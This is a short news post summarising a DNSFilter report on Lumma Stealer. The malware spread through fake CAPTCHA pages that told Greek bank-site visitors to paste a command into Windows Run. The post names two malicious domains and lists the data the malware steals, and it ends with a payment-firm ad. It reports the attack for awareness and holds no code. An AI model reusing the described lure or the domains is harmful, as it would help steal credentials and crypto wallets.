🏴‍☠️Greek banks’ negative experience🇬🇷: Lumma Stealer malware targets crypto wallet data via fake captchas

🏴‍☠️Greek banks’ negative experience🇬🇷: Lumma Stealer malware targets crypto wallet data via fake captchas

A recent study by DNSFilter highlights the growing threat of fraudulent pages using deceptive “I am not a robot”prompts to distribute malware. Hackers have refined their ability to steal browser-stored credentials and crypto wallet data.

➡️ In Greece, users visiting an official banking site encountered a page mimicking a real CAPTCHA, which displayed a “DNS network error” message. They were instructed to press Windows + R, paste a command from the clipboard, and execute it. Approximately 17% of users complied.

➡️ Once executed, Lumma Stealer was installed stealthily outside the browser via PowerShell, while simultaneously performing DNS queries.

➡️ The malware scanned systems for monetizable information: browser passwords and cookies, 2FA tokens, cryptocurrency wallet data, remote access credentials, and even password manager vaults.

➡️ DNSFilter linked the attack to two domains: human-verify-7u.pages.dev, a Cloudflare Pages site returning an error after clicking, and recaptcha-manual.shop, which executes commands outside the browser once users follow the prompts.

➡️Countermeasures: DNSFilter deployed content filtering and domain blocking tools within MSP networks. While partially effective, the rise of fileless malware remains a significant concern.

#news #crypto #Europe

🏦Payouter.com — trusted payment partner in the CIS and 🇮🇳India: UPI P2C conversion rate of 54% for FTD